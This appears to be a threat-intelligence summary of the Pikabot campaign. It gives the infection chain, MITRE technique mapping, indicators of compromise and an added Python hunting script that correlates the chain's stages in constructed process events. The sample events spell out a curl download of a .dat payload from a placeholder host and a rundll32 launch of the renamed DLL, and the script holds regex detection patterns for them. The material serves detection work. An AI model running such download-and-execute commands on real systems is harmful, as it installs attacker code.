Threat researchers at eSentire document Pikabot, a malware campaign affecting the manufacturing and business services sectors. The infection chain combines phishing, an obfuscated JavaScript dropper, and process hollowing with layered encryption and anti-analysis features: Pikabot hides in encrypted payloads, injects into a legitimate Windows process, exfiltrates host information, and refuses to run on systems whose language is set to Russian or Ukrainian.
#PikaBot #AnyDesk
Keypoints
- Pikabot activity observed since October 2023, affecting manufacturing and business services sectors.
- Initial infection via phishing emails containing a link to download a ZIP archive with an obfuscated JavaScript dropper.
- The JavaScript downloader retrieves a DAT file from one of several URLs via curl (curl.exe ships with current Windows builds, so its presence alone is not suspicious), renames it to Wiflgodjvo.dll, and executes it with rundll32.exe, calling the export "Enter".
- PikaBot injects into SearchProtocolHost.exe via process hollowing (T1055.012). Strings are obfuscated with inline RC4; the RC4-decrypted, base64-encoded strings then pass through a second AES layer whose key and IV are themselves RC4-encrypted. The same scheme protects C2 data.
- Payload gathers host information (netstat, ipconfig, whoami) and includes a language check that halts execution if the system language is Russian or Ukrainian.
- Drive-by delivery was also observed: a malicious AnyDesk-themed page serving a signed MSI installer, plus two domains impersonating Slack and Zoom. A hardcoded mutex prevents the payload from reinfecting an already-compromised host.
MITRE Techniques
- [T1566.002] Spearphishing Link – The initial infection stems from an email containing a link to download a ZIP archive. “The initial infection stems from an email containing a link to download a ZIP archive”
- [T1059.007] Command and Scripting Interpreter: JavaScript – An obfuscated JavaScript file in the ZIP is responsible for infection when executed. “which in turn, contains an obfuscated JavaScript file responsible for infecting the device when executed by the user.”
- [T1105] Ingress Tool Transfer – The malware retrieves the malicious .DAT file from URLs via curl, then renames it to Wiflgodjvo.dll. “it retrieves the malicious .DAT file from URLs (1,2,5) via curl. Upon successful retrieval of the malicious file, it gets renamed to Wiflgodjvo.dll.”
- [T1218.001] Signed Binary Proxy Execution: Rundll32 – The malicious DLL runs with rundll32.exe and an export name “Enter”. “The malicious DLL file then runs with rundll32.exe and an export name “Enter””
- [T1055.012] Process Injection: Process Hollowing – PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012). “PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012).”
- [T1027] Obfuscated/Compressed Files and Information – Inline RC4 encryption to obfuscate strings and AES decryption with RC4-encrypted key/IV. “The inline RC4 encryption in Pikabot is used to obfuscate its strings, … ” and “The RC4-decrypted base64-encoded strings then go through another decryption layer with AES.”
- [T1082] System Information Discovery – The payload gathers basic host information (netstat, ipconfig, whoami). The accompanying language check, which halts execution on Russian or Ukrainian systems, maps more precisely to T1614.001 (System Location Discovery: System Language Discovery). “The payload examines the language setting of the infected system, and if it detects that the system is set to Russian or Ukrainian, it refrains from executing any further code.”
- [T1189] Drive-by Compromise – Drive-by download example via malicious AnyDesk-related page. “In this instance, the client searched for AnyDesk installer and stumbled across the malicious page …”
- [T1036] Masquerading – Domains impersonating Slack and Zoom used to host or distribute payload. “Pivoting with VirusTotal, we found another two domains impersonating Slack and Zoom.”
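The keypoints and the MITRE mapping above describe one delivery chain: a JavaScript dropper run from an archive, curl fetching a .dat, rundll32.exe loading the renamed DLL through the "Enter" export, and SearchProtocolHost.exe being hollowed. The script below is an added hunting example (not eSentire's code or tooling) that runs those stages as rules over constructed, Sysmon-style process-creation events and raises an alert only when at least two stages fire on the same host within a time window. The sample events, field names, the time window, and the assumption that SearchProtocolHost.exe is normally spawned by SearchIndexer.exe (so a rundll32.exe parent is anomalous) are the author's, not from the original report.

```python
"""Correlate the Pikabot delivery stages in process-creation telemetry.

Added example, not from the eSentire report. Events are constructed to resemble
Sysmon Event ID 1 fields; thresholds and the "normal parent" assumption for
SearchProtocolHost.exe are the author's assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real events). WS01 carries the full chain;
# WS02 carries benign look-alikes that the rules must not flag.
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": "2023-11-02T09:14:02", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'wscript.exe "C:\Users\bob\AppData\Local\Temp\Temp1_Invoice.zip\Invoice_8827.js"'},
    {"host": "WS01", "ts": "2023-11-02T09:14:05", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmd": r"curl.exe -o C:\ProgramData\Wiflgodjvo.dat http://example.invalid/file.dat"},
    {"host": "WS01", "ts": "2023-11-02T09:14:09", "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmd": r"rundll32.exe C:\ProgramData\Wiflgodjvo.dll,Enter"},
    {"host": "WS01", "ts": "2023-11-02T09:14:10", "image": r"C:\Windows\System32\SearchProtocolHost.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"SearchProtocolHost.exe"},
    {"host": "WS02", "ts": "2023-11-02T09:20:00", "image": r"C:\Windows\System32\SearchProtocolHost.exe",
     "parent": r"C:\Windows\System32\SearchIndexer.exe",          # legitimate indexer child
     "cmd": r"SearchProtocolHost.exe Global\UsGthrFltPipeMssGthrPipe1_"},
    {"host": "WS02", "ts": "2023-11-02T09:21:00", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",                    # admin curl, no .dat
     "cmd": r"curl.exe -sS https://example.invalid/health"},
]


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# One predicate per chain stage. Each returns a truthy value when the event matches.
RULES = [
    # Script host running a .js from a temp or archive-extraction path (dropper).
    ("js_dropper_from_archive", lambda e: _base(e["image"]) in ("wscript.exe", "cscript.exe")
        and re.search(r"\.js\b", e["cmd"], re.I)
        and re.search(r"\\temp\\|\.zip\\", e["cmd"], re.I)),
    # curl.exe pulling a .dat file (the stage-two download in the report).
    ("curl_downloads_dat", lambda e: _base(e["image"]) == "curl.exe"
        and re.search(r"\.dat\b", e["cmd"], re.I)),
    # rundll32.exe invoking a DLL through the export named in the report.
    ("rundll32_export_enter", lambda e: _base(e["image"]) == "rundll32.exe"
        and re.search(r"\.dll,\s*Enter\b", e["cmd"])),
    # SearchProtocolHost.exe with a parent other than the indexer/service manager
    # (author's assumption about the normal parent; tune to your environment).
    ("searchprotocolhost_unusual_parent", lambda e: _base(e["image"]) == "searchprotocolhost.exe"
        and _base(e["parent"]) not in ("searchindexer.exe", "services.exe")),
]

WINDOW = timedelta(minutes=10)  # assumed correlation window


def match_events(events):
    """Return (host, timestamp, [rule names]) for every event that trips a rule."""
    hits = []
    for e in events:
        names = [name for name, pred in RULES if pred(e)]
        if names:
            hits.append((e["host"], datetime.fromisoformat(e["ts"]), names))
    return hits


def correlate(events, window=WINDOW):
    """Map host -> set of chain stages seen together within `window`.

    A host is reported only when at least two distinct stages fire inside one
    window, so a lone curl .dat download or a single odd parent is not enough.
    """
    by_host = defaultdict(list)
    for host, ts, names in match_events(events):
        by_host[host].append((ts, names))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            stages = set()
            for ts, names in hits[i:]:
                if ts - start > window:
                    break
                stages.update(names)
            if len(stages) >= 2:
                alerts[host] = alerts.get(host, set()) | stages
    return alerts


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(sorted(stages))}")
```

Run it as-is and only WS01 is reported, with all four stages; the legitimate SearchIndexer.exe child and the plain curl call on WS02 trip no rule. In production, feed real Sysmon or EDR events into `correlate`, and add the hardcoded mutex from the IoC list as a further, host-local confirmation rather than a telemetry rule.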
Indicators of Compromise
- [Domain] anadesky.firstbasedso[.]com – drive-by download page delivering the malicious MSI installer. “malicious page anadesky.firstbasedso[.]com”
- [File] Wiflgodjvo.dll – payload DLL renamed from a downloaded DAT file.
- [Process] SearchProtocolHost.exe – process into which Pikabot injects via process hollowing.
- [Mutex] {C1E8A9B1-57F0-47B0-AB93-C739C6592C5F} – hardcoded mutex to prevent reinfection.
- [File] Malicious MSI installer signed by “The New Print Shop LTD” – delivered by the drive-by page; the valid code signature does not make the installer benign.
- [Domain] two domains impersonating Slack and Zoom – used for deception/malware distribution.
Read more: https://www.esentire.com/blog/the-rising-threat-of-pikabot